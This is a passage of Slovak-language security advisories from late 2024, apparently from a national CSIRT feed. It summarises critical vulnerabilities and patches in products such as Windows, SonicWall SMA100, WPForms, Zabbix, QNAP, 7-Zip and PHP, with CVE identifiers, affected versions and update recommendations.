Obídenie bezpečnostných mechanizmov
Získanie úplnej kontroly nad systémom

Odporúčania:

Výrobca odporúča používať len verzie s platnou technickou podporou a zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie. Konkrétne verzie produktov a návod na inštaláciu aktualizácií môžete nájsť na stránkach výrobcu v časti Zdroje.

Zdroje:

Microsoft v rámci decembrového Patch Tuesday opravil 17 kritických zraniteľností

Marian Danko — Thu, 12 Dec 2024 12:21:03 +0000

Spoločnosť Microsoft vydala v decembri 2024 balík opráv pre portfólio svojich produktov opravujúci 72 zraniteľností, z ktorých 31 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú v komponentoch Windows Remote Desktop Services a Client, Windows Lightweight Directory Access Protocol a Client, Windows Hyper-V, Microsoft Message Queuing, Windows Local Security Authority Subsystem Service a možno ich zneužiť vzdialené vykonanie škodlivého kódu. Zraniteľnosť v komponente Windows Common Log File System Driver (CVE-2024-49138) v súčasnosti útočníci aktívne zneužívajú.

Zraniteľné systémy:

Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Access 2016 (32-bit edition)
Microsoft Access 2016 (64-bit edition)
Microsoft Defender for Endpoint for Android
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Word 2016 (32-bit edition)
Microsoft Word 2016 (64-bit edition)
Microsoft/Muzic
Remote Desktop client for Windows Desktop
System Center Operations Manager (SCOM) 2019
System Center Operations Manager (SCOM) 2022
System Center Operations Manager (SCOM) 2025
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows App Client for Windows Desktop
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)

Opis činnosti:

I. Kritické zraniteľnosti:

CVE-2024-49105 (CVSS skóre 8,4)

Kritická zraniteľnosť v Remote Desktop Client spočíva v nesprávnej implementácii mechanizmov riadenia prístupu a vzdialený útočník by ju mohol zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa s oprávneniami administrátora, ktorý musí iniciovať spojenie Remote Desktop (RDP) na škodlivý server pod kontrolou útočníka.

CVE-2024-49106, CVE-2024-49108, CVE-2024-49115, CVE-2024-49116, CVE-2024-49119, CVE-2024-49120, CVE-2024-49123, CVE-2024-49128, CVE-2024-49132 (CVSS skóre 8,1)

Zraniteľnosti v komponente Windows Remote Desktop Services spočívajú v použití odalokovaného miesta v pamäti a nedostatočnom zabezpečení citlivých údajov v pamäti (CVE-2024-49106, CVE-2024-49108, CVE-2024-49115, CVE-2024-49116, CVE-2024-49123, CVE-2024-49128, CVE-2024-49132), nesprávnom vyhodnocovaní dátových typov (CVE-2024-49119) a nesprávnej inicializácii premenných (CVE-2024-49120) a umožňujú vzdialené vykonanie kódu. Zraniteľnosť možno zneužiť pripojením sa na zraniteľné systémy v konfigurácii Remote Desktop Gateway. Úspešné zneužitie zraniteľností vyžaduje, aby útočník vyhral súbeh procesov.

CVE-2024-49112 (CVSS skóre 9,8)

Komponent Windows Lightweight Directory Access Protocol (LDAP) obsahuje kritickú zraniteľnosť, ktorú by vzdialený neautentifikovaný útočník prostredníctvom špeciálne vytvorených volaní LDAP mohol zneužiť na vzdialené vykonanie kódu. Pokusy o zneužitie zraniteľnosti je možné mitigovať aj blokovaním prichádzajúcich volaní RPC z nedôveryhodných sietí v nastaveniach doménového radiča.

CVE-2024-49124, CVE-2024-49127 (CVSS skóre 8,1)

Zraniteľnosti v Windows Lightweight Directory Access Protocol (LDAP) spočívajú v použití odalokovaného miesta v pamäti a v nesprávnej synchronizácii procesov pri prístupe ku zdieľaným zdrojom. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na vzdialené vykonanie kódu s oprávneniami používateľa SYSTEM. Zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.

CVE-2024-49117 (CVSS skóre 8,8)

Zraniteľnosť v hypervízore Hyper-V spočíva v generovaní nesprávnych stavových kódov a možno ju zneužiť na vzdialené vykonanie kódu na hostiteľskom serveri. Zneužitie zraniteľnosti vyžaduje, aby autentifikovaný útočník z virtuálneho stroja (VM) zaslal špeciálne vytvorenú požiadavku pre manipuláciu so súbormi na hardvérové zdroje VM. Úspešné zneužitie zraniteľnosti môže viesť k tzv. cross-VM útoku, v rámci ktorého na hostiteľskom zariadení dochádza ku kompromitácii viacerých virtuálnych strojov.

CVE-2024-49122, CVE-2024-49118 (CVSS skóre 8,1)

Zraniteľnosti v komponente Microsoft Message Queuing (MSMQ) spočívajú v použití odalokovaného miesta v pamäti a umožňujú vzdialené vykonanie kódu. Zraniteľnosť je možné zneužiť zaslaním špeciálne vytvorených MSMQ paketov na MSMQ server. Úspešné zneužitie zraniteľnosti je časovo náročné, nakoľko vyžaduje, aby útočník vyhral súbeh procesov.

CVE-2024-49126 (CVSS skóre 8,1)

Windows Local Security Authority Subsystem Service (LSASS) obsahuje zraniteľnosť spočívajúcu v použití odalokovaného miesta v pamäti a nedostatočnom zabezpečení citlivých údajov v pamäti. Vzdialený neautentifikovaný útočník by ju prostredníctvom špeciálnych sieťových volaní mohol zneužiť na vzdialené vykonanie kódu. Úspešné zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.

II. Aktívne zneužívané zraniteľnosti:

CVE-2024-49138 (CVSS skóre 7,8)

Zraniteľnosť nachádzajúca sa v komponente Windows Common Log File System Driver spočíva v pretečení medzipamäte haldy a vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií na úroveň oprávnení SYSTEM. Zraniteľnosť v súčasnosti aktívne zneužívajú útočníci.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií

Odporúčania:

Bezodkladné nasadenie decembrového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete tu.

Zdroje:

Zraniteľnosti SSL-VPN v zariadeniach série SMA100 od spoločnosti SonicWall

Marian Danko — Thu, 12 Dec 2024 12:02:29 +0000

Spoločnosť SonicWall vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností vo funkcionalite SSL-VPN zariadení série SMA100. Najzávažnejšie zraniteľnosti s označením CVE-2024-53703, CVE-2024-45318, CVE-2024-40763 a CVE-2024-38475 možno zneužiť na vzdialené vykonanie kódu a získanie neoprávneného prístupu k citlivým údajom.

Zraniteľné systémy:

SSL-VPN v zariadeniach série SMA100 (SMA 200, 210, 400, 410 a 500v) vo verziách starších ako 10.2.1.14-75sv

Opis zraniteľnosti:

CVE-2024-45318, CVE-2024-53703 (CVSS skóre 8,1)

Pretečenie vyrovnávacej pamäte zásobníka vo webovom manažmentovom rozhraní (CVE-2024-45318) a knižnici mod_httprp v zabudovanom komponente Apache HTTP Server (CVE-2024-53703) možno zneužiť na vzdialené vykonanie kódu. Zraniteľnosť je možné zneužiť bez autentifikácie.

CVE-2024-40763 (CVSS skóre 7,5)

Nesprávne využitie funkcie strcpy vedúce k pretečeniu medzipamäte haldy by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

CVE-2024-38475 (CVSS skóre 7,5)

Zraniteľnosť v zabudovanom komponente Apache HTTP Server spočívajúcu v nesprávnom ošetrovaní výstupov mod_rewrite by vzdialený neautentifikovaný útočník mohol zneužiť na mapovanie URL odkazov na systémové súbory, ktoré môže server poskytovať a získanie neoprávneného prístupu k citlivým údajom.

Ostatné zraniteľnosti možno zneužiť na obídenie mechanizmov autentifikácie založených na báze bezpečnostných certifikátov (CVE-2024-45319) a získanie záložných kódov generovaných prostredníctvom generátora pseudonáhodných čísel (CVE-2024-53702).

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Obídenie mechanizmov autentifikácie

Odporúčania:

Bezodkladná aktualizácia zasiahnutých systémov na verziu 10.2.1.14-75sv alebo novšiu.

Zdroje:

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018

Vysoko závažná zraniteľnosť v plugine WordPress WPForms

Marian Danko — Thu, 12 Dec 2024 11:42:24 +0000

Vývojári WordPress pluginu WPForms vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2024-11205 možno vykonaním neoprávnených zmien v systéme zneužiť vrátenie platieb alebo zrušenie predplatného implementovaného prostredníctvom služby Stripe a spôsobiť tak finančné škody prevádzkovateľom zraniteľných webových stránok.

Zraniteľné systémy:

WordPress plugin WPForms vo verziách 1.8.4 až 1.9.2.1

Opis zraniteľnosti:

CVE-2024-11205 (CVSS skóre 8,5)

Vysoko závažná zraniteľnosť spočíva v chýbajúcej autorizácii vo funkcii wpforms_is_admin_ajax(), ktorá slúži na identifikáciu administrátorských AJAX volaní. V rámci triedy SingleActionsHandler zodpovednej za spracovanie platobných operácií prostredníctvom služby Stripe je táto funkcia používaná na sprístupnenie administrátorských funkcií ajax_single_payment_refund() a ajax_single_payment_cancel(). Vzdialený autentifikovaný útočník s oprávneniami úrovne Subscriber alebo vyššími by zraniteľnosť mohol zneužiť na vrátenie platieb alebo zrušenie predplatného a spôsobiť tak finančné škody prevádzkovateľom zraniteľných webových stránok.

Zraniteľnosť v rámci Wordfence Bug Bounty programu odhalil bezpečnostný výskumník vystupujúci pod aliasom villu164.

Možné škody:

Neoprávnená zmena v systéme

Odporúčania:

Bezodkladná aktualizácia zásuvného modulu WPForms na verziu 1.9.2.2.

Zdroje:

Mesačný prehľad kritických zraniteľností november 2024

Marian Danko — Fri, 06 Dec 2024 12:51:01 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci november 2024.

Mesačný prehľad – 11/2024 PDF (647 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Kritická zraniteľnosť manažmentového nástroja Veeam Service Provider Console

Marian Danko — Fri, 06 Dec 2024 11:21:01 +0000

Spoločnosť Veeam vydala bezpečnostné aktualizácie nástroja Veeam Service Provider Console (VSPC), ktoré opravujú dve zraniteľnosti, z čoho jedna je označená ako kritická. CVE-2024-42448 možno zneužiť na vzdialené vykonanie kódu na serveroch VSPC.

Zraniteľné systémy:

Veeam Service Provider Console 7.0.X
Veeam Service Provider Console 8.0.X
Veeam Service Provider Console 8.1.X staršej ako 8.1.0.21999

Opis činnosti:

CVE-2024-42448 (CVSS skóre 9,9)

Bližšie nešpecifikovanú kritickú zraniteľnosť CVE-2024-42448 by vzdialený autentifikovaný útočník s prístupom k manažmentovým agentom VSPC mohol zneužiť na vzdialené vykonanie kódu na serveroch Veeam Service Provide Console.

CVE-2024-42449 (CVSS skóre 7,1)

Vysoko závažnú zraniteľnosť s identifikátorom CVE-2024-42449 možno zneužiť na získanie NTLM hashu servisného účtu servera VSPC a zmazanie súborov na serveri Veeam Service Provide Console.

Pozn.: Úspešné zneužitie zraniteľností vyžaduje autorizáciu zneužitých agentov na cieľových VSPC serveroch.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme

Odporúčania:

Výrobca odporúča používať len verzie s platnou technickou podporou a zasiahnuté systémy aktualizovať na verziu 8.1.0.21999.

Zdroje:

Kritická zraniteľnosť v IAM systéme SailPoint IdentityIQ

Marian Danko — Fri, 06 Dec 2024 11:15:47 +0000

Spoločnosť SailPoint vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte IdentityIQ. Jedná sa o IAM (Identity and Access Management) platformu pre overovanie identity používateľov. CVE-2024-10905 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

SailPoint IdentityIQ 8.4 vo verziách starších ako 8.4p2
SailPoint IdentityIQ 8.3 vo verziách starších ako 8.3p5
SailPoint IdentityIQ 8.2 vo verziách starších ako 8.2p8
SailPoint IdentityIQ vo verziách starších ako 8.2

Opis činnosti:

CVE-2024-10905 (CVSS skóre 10,0)

Bližšie nešpecifikovaná zraniteľnosť s označením CVE-2024-10905 spočíva v nesprávnom narábaní s názvami súborov a vzdialený neautorizovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom (obsahu zložky) aplikácie. Údaje možno následne zneužiť na úplné narušenie dôvernosti, integrity a dostupnosti systému.

Možné škody:

Neoprávnený prístup k citlivým údajom
Získanie úplnej kontroly nad systémom

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie 8.4p2, 8.3p5 alebo 8.2p8.

Zdroje:

Bezpečnostní výskumníci zverejnili PoC kód pre zneužitie kritickej zraniteľnosti v Progress WhatsUp Gold

Marian Danko — Fri, 06 Dec 2024 11:11:30 +0000

Bezpečnostní výskumníci zo spoločnosti Tenable zverejnili proof-of-concept kód demonštrujúci postup zneužitia kritickej zraniteľnosti v produkte Progress WhatsUp Gold, ktorá bola opravená aktualizáciami zo septembra 2024. CVE-2024-8785 možno zneužiť na vykonanie neoprávnených zmien v systéme a následné vykonanie škodlivého kódu.

Zraniteľné systémy:

Progress WhatsUp Gold vo verziách starších ako 24.0.1 (od verzie 23.1.0)

Opis činnosti:

CVE-2024-8785 (CVSS skóre 9,8)

Kritická zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov vo funkcii UpdateFailoverRegistryValues v rámci sieťového manažmentového API, ktoré vytvára proces NmAPI.exe. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek na port 9643 mohol zneužiť na vytvorenie nových alebo modifikáciu obsahu existujúcich Windows registrov v HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\. Modifikácia špecifických registrov definujúcich umiestnenie konfiguračných súborov aplikácie umožňuje vykonanie neoprávnených zmien v konfigurácii systému a vzdialené vykonanie kódu.

Pozn.: Spoločnosť Progress v rámci aktualizácií zo septembra 2024 opravila aj ďalšie bezpečnostné zraniteľnosti. Kritická zraniteľnosť CVE-2024-46909 umožňovala vzdialené vykonanie kódu. Vysoko závažné zraniteľnosti s označením CVE-2024-46908, CVE-2024-46907, CVE-2024-46906 a CVE-2024-46905 by vzdialený autentifikovaný útočník prostredníctvom SQL injekcie mohol zneužiť na eskaláciu privilégií na úroveň oprávnení administrátora.

Možné škody:

Neoprávnená zmena v systéme
Vzdialené vykonanie kódu
Eskalácia privilégií

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verziu 24.0.1 alebo novšiu.

Zdroje:

Kritické zraniteľnosti v monitorovacej platforme Zabbix

Marian Danko — Fri, 29 Nov 2024 15:40:54 +0000

Vývojári monitorovacej platformy Zabbix vydali bezpečnostné aktualizácie, ktoré opravujú 4 zraniteľnosti, z čoho 2 sú označené ako kritické. Kritické zraniteľnosti s identifikátormi CVE-2024-42330 a CVE-2024-42327 možno zneužiť na eskaláciu privilégií, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Zabbix 5.0.X vo verziách starších ako 5.0.43rc1
Zabbix 6.0.X vo verziách starších ako 6.0.34rc1
Zabbix 6.4.X vo verziách starších ako 6.4.19rc1
Zabbix 7.0.X vo verziách starších ako 7.0.4rc1

Opis zraniteľnosti:

CVE-2024-42330 (CVSS skóre 9,1)

Kritická zraniteľnosť v komponente Server spočíva v nedostatočnom overovaní polí HTTP hlavičiek a vzdialený autentifikovaný útočník by ju mohol zneužiť na získanie prístupu ku skrytým vlastnostiam objektov a vzdialené vykonanie kódu.

CVE-2024-42327 (CVSS skóre 9,9)

CVE-2024-42327 spočíva v nedostatočnom overovaní používateľských vstupov v rámci funkcie CUser.get. Vzdialený autentifikovaný útočník s oprávneniami umožňujúcimi prístup k API rozhraniu by ju prostredníctvom SQL injekcie mohol zneužiť na eskaláciu privilégií a na získanie úplnej kontroly nad systémom.

Vysoko závažné zraniteľnosti s označením CVE-2024-36466 a CVE-2024-36467 možno zneužiť na získanie neoprávneného prístupu do systému a eskaláciu privilégií.

Možné škody:

Vzdialené vykonávanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Získanie úplnej kontroly nad systémom

Odporúčania:

Bezodkladná aktualizácia zraniteľných systémov na verzie špecifikované výrobcom v odkazoch v časti „Zdroje“.

Zdroje:

Kritické zraniteľnosti vo WordPress plugine Spam Protection, Anti-Spam, FireWall

Marian Danko — Fri, 29 Nov 2024 15:34:10 +0000

Vývojári WordPress pluginu Spam Protection, Anti-Spam, FireWall vydali bezpečnostné aktualizácie, ktoré opravujú 2 kritické zraniteľnosti. Zraniteľnosti s označením CVE-2024-10542 a CVE-2024-10781 možno zneužiť na inštaláciu, odstránenie, aktiváciu a deaktiváciu ľubovoľných pluginov redakčného systému a následné získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

WordPress plugin Spam Protection, Anti-Spam, FireWall vo verziách 6.44 a starších

Opis zraniteľnosti:

CVE-2024-10542 (CVSS skóre 9,8)

Kritickú zraniteľnosť vo funkcii checkWithoutToken by vzdialený neautentifikovaný útočník prostredníctvom DNS spoofingu mohol zneužiť na obídenie mechanizmov autentifikácie a následnú inštaláciu a aktiváciu pluginov redakčného systému.

CVE-2024-10781 (CVSS skóre 9,8)

Zraniteľnosť CVE-2024-10781 vo funkcii perform spočíva v nedostatočnom overovaní hodnôt premennej api_key a možno ju zneužiť na obídenie mechanizmov autentifikácie a následnú inštaláciu a aktiváciu pluginov redakčného systému.

Pozn. Aktiváciou ľubovoľných pluginov možno dosiahnuť vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Možné škody:

Neoprávnená zmena v systéme
Vykonávanie škodlivého kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Bezodkladná aktualizácie zásuvného modulu Spam Protection, Anti-Spam, FireWall na verziu 6.45.

Zdroje:

Kritické zraniteľnosti v produktoch QNAP

Marian Danko — Fri, 29 Nov 2024 15:29:44 +0000

Spoločnosť QNAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 8 zraniteľností, z čoho 3 sú označené ako kritické. Kritické zraniteľnosti v produkte Notes Station 3 (CVE-2024-38643, CVE-2024-38645) a routeroch QuRouter (CVE-2024-48860) možno zneužiť na realizáciu SSRF útokov, získanie neoprávneného prístupu k citlivým údajom a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Notes Station 3 vo verziách starších ako 3.9.7
QuRouter vo verziách starších ako 2.4.3.106
QNAP AI Core vo verziách starších ako 3.4.1
QuLog Center vo verziách starších ako 1.7.0.831
QuLog Center vo verziách starších ako 1.8.0.888

Opis zraniteľnosti:

Notes Station 3:

CVE-2024-38643 (CVSS skóre 9,3)

Kritická zraniteľnosť v produkte Notes Station 3 spočíva v chýbajúcej implementácii mechanizmov autentifikácie pre bližšie nešpecifikovanú kritickú funkciu a vzdialený neautentifikovaný útočník by ju mohol zneužiť na získanie neoprávneného prístupu do systému a následné vykonanie špecifickej podmnožiny systémových funkcií.

CVE-2024-38645 (CVSS skóre 9,4)

CVE-2024-38645 by vzdialený autentifikovaný útočník mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov a získanie neoprávneného prístupu k citlivým údajom.

Ostatné zraniteľnosti s označením CVE-2024-38644 a CVE-2024-38646 možno zneužiť na eskaláciu privilégií, injekciu príkazov operačného systému, vykonanie neoprávnených zmien v systéme a získanie neoprávneného prístupu k citlivým údajom.

QuRouter:

CVE-2024-48860 (CVSS skóre 9,5)

Bližšie nešpecifikovanú kritickú zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu príkazov operačného systému a získanie úplnej kontroly nad systémom.

Vysoko závažnú zraniteľnosť s označením CVE-2024-48861 by lokálny neautentifikovaný útočník s fyzickým prístupom k zariadeniu mohol zneužiť na injekciu príkazov operačného systému.

QNAP AI Core, QuLog Center:

CVE-2024-38647 v produkte QNAP AI Core možno zneužiť na získanie neoprávneného prístupu k citlivým údajom.

QuLog Center obsahuje zraniteľnosť CVE-2024-48862, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na čítanie a úpravu obsahu súborov na súborovom systéme.

Možné škody:

Vzdialené vykonávanie príkazov
Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom
Eskalácia privilégií
Neoprávnená zmena v systéme
Neoprávnený prístup k citlivým údajom

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie špecifikované výrobcom v odkazoch v sekcii zdroje.

Zdroje:

Aktívne zneužívaná zraniteľnosť v platforme ProjectSend

Marian Danko — Fri, 29 Nov 2024 15:22:27 +0000

Bezpečnostní výskumníci zo spoločnosti VulnCheck varovali pred aktívnym zneužívaním kritickej zraniteľnosti v open source platforme pre zdieľanie súborov ProjectSend. CVE-2024-11680 možno zneužiť na vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

ProjectSend vo verziách starších ako r1720

Opis zraniteľnosti:

CVE-2024-11680 (CVSS skóre 9,8)

Kritická zraniteľnosť spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorených HTTP požiadaviek na options.php mohol zneužiť na zmenu konfigurácie aplikácie, vytváranie používateľských účtov, nahrávanie webshellov a injekciu škodlivého JavaScript kódu.

Pozn. Zraniteľnosť bola opravená už v máji 2023, ale nakoľko bol CVE identifikátor pridelený až v novembri 2024, veľké množstvo inštancií zostáva podľa výskumníkov zraniteľných. Zraniteľnosť je aktívne zneužívaná minimálne od septembra 2024.

Možné škody:

Vykonávanie škodlivého kódu
Neoprávnená zmena v systéme
Získanie úplnej kontroly nad systémom

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verziu r1720 a novšiu.

Zneužitie zraniteľnosti na upload webshellu možno odhaliť preverením prítomnosti podozrivých .PHP súborov v priečinku /upload/files/. Zneužitie zraniteľnosti indikuje aj prítomnosť podozrivých textových reťazcov v názve domovskej stránky alebo neočakávaná aktivácia funkcie pre registráciu nových používateľov.

Zdroje:

Kritické zraniteľnosti bezdrôtových prístupových bodov Advantech EKI

Marian Danko — Fri, 29 Nov 2024 15:18:24 +0000

Spoločnosť Advantech vydala bezpečnostné aktualizácie na svoje priemyselné bezdrôtové prístupové body (access pointy) série EKI, ktoré opravujú 20 zraniteľností, z čoho 6 je označených ako kritické. CVE-2024-50370 až CVE-2024-50375 možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

EKI-6333AC-2G s firmvérom vo verziách starších ako v1.6.5
EKI-6333AC-2GD s firmvérom vo verziách starších ako v1.6.5
EKI-6333AC-1GPO s firmvérom vo verziách starších ako v1.2.2

Opis zraniteľnosti:

CVE-2024-50370 až CVE-2024-50375 (CVSS skóre 9,8)

Kritické zraniteľnosti s identifikátormi CVE-2024-50370 až CVE-2024-50374 spočívajú v nevhodnej neutralizácii špeciálnych znakov v príkazoch operačného systému. CVE-2024-50375 spočíva v chýbajúcich mechanizmoch autentifikácie pre prístup k bližšie nešpecifikovanej kritickej funkcii. Uvedené zraniteľnosti by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie mechanizmov autentifikácie, vykonanie škodlivého kódu s oprávneniami úrovne root a získanie úplnej kontroly nad systémom.

Ostatné vysoko závažné zraniteľnosti možno zneužiť na realizáciu XSS útokov, injekciu systémových príkazov, zneprístupnenie služby a získanie neoprávneného prístupu k citlivým údajom.

Možné škody:

Neoprávnený prístup do systému
Vzdialené vykonávanie kódu
Nedostupnosť služby
Neoprávnený prístup k citlivým údajom
Získanie úplnej kontroly nad systémom

Odporúčania:

Bezodkladná aktualizácia firmvéru zraniteľných produktov na verzie špecifikované výrobcom.

Zdroje:

https://www.nozominetworks.com/blog/over-the-air-vulnerabilities-discovered-in-advantech-eki-access-points

Kritická zraniteľnosť v komprimačnom nástroji 7-Zip

Marian Danko — Fri, 29 Nov 2024 15:10:03 +0000

Vývojári komprimačného nástroja 7-Zip vydali bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť. CVE-2024-11477 možno podvrhnutím špeciálne vytvorených súborov zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

7-Zip vo verziách starších ako 24.07

Opis zraniteľnosti:

CVE-2024-11477 (CVSS skóre 7,8)

Kritická zraniteľnosť s označením CVE-2024-11477 spočíva v nedostatočnom overovaní používateľských vstupov v rámci implementácie dekompresie Zstandard. Vzdialený neautentifikovaný útočník by prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol spôsobiť podtečenie celočíselnej premennej a následne vykonať škodlivý kód. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorené súbory. Zraniteľnosť odhalili výskumníci zo Zero Day Initiative (ZDI).

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu 7-Zip na verziu 24.07 alebo novšiu.

Zdroje:

Kritická zraniteľnosť vo funkcii PHP

Marian Danko — Mon, 25 Nov 2024 14:56:04 +0000

Bezpečnostný výskumník Yiheng Cao objavil kritickú zraniteľnosť vyskytujúcu sa v implementácii PHP funkcie ldap_escape() na 32-bitových systémoch. Táto zraniteľnosť súvisí s pretečením medzipamäte, čo umožňuje zápis do pamäte mimo povolené hodnoty.

Zraniteľné systémy:

PHP 8.1.x staršie ako 8.1.31
PHP 8.2.x staršie ako 8.2.26
PHP 8.3.x staršie ako 8.3.14

Opis činnosti:

CVE-2024-8932 (CVSS skóre 9,8)

Kritická zraniteľnosť sa nachádza vo funkcii ldap_escape() na 32-bitových systémoch a vyplýva z chýbajúcej kontroly dlhých reťazcov ako vstupov. Tieto môžu spôsobiť pretečenie celočíselnej premennej, čo vedie k zápisu mimo povolené hodnoty pamäte.

Možné škody:

Poškodenie pamäte

Odporúčania:

Bezodkladná aktualizácia PHP aspoň na verzie:

8.1.31
8.2.26
8.3.14

Odkazy:

Aktívne zneužívaná zero-day zraniteľnosť v Oracle Agile PLM Framework

Marian Danko — Fri, 22 Nov 2024 10:34:51 +0000

Spoločnosť Oracle vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť v produkte Agile Product Lifecycle Management (PLM) Framework. CVE-2024-21287 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom.

Zraniteľné systémy:

Oracle Agile PLM Framework vo verzii 9.3.6

Opis zraniteľnosti:

CVE-2024-21287 (CVSS skóre 7,5)

Bližšie nešpecifikovanú vysoko závažnú zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť na stiahnutie súborov zo súborového systému a získanie neoprávneného prístupu k citlivým údajom. Bezpečnostnú zraniteľnosť objavili výskumníci zo spoločnosti CrowdStrike.

Možné škody:

Neoprávnený prístup k citlivým údajom

Odporúčania:

Spoločnosť Oracle odporúča bezodkladnú aktualizáciu zraniteľných systémov.

Zdroje:

Zraniteľnosti v linuxovom nástroji needrestart umožňujú získanie úplnej kontroly nad systémom

Marian Danko — Fri, 22 Nov 2024 10:24:49 +0000

Vývojári linuxového nástroja needrestart vydali bezpečnostné aktualizácie, ktoré opravujú 5 zraniteľností. Zraniteľnosti s označením CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224 a CVE-2024-11003 by lokálny autentifikovaný útočník mohol zneužiť na získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

needrestart vo verziách starších ako 3.8

Pozn. Komponent needrestart je súčasťou predvolenej inštalácie Ubuntu Server od verzie 21.04

Opis zraniteľnosti:

CVE-2024-48990, CVE-2024-48992 (CVSS skóre 7,8)

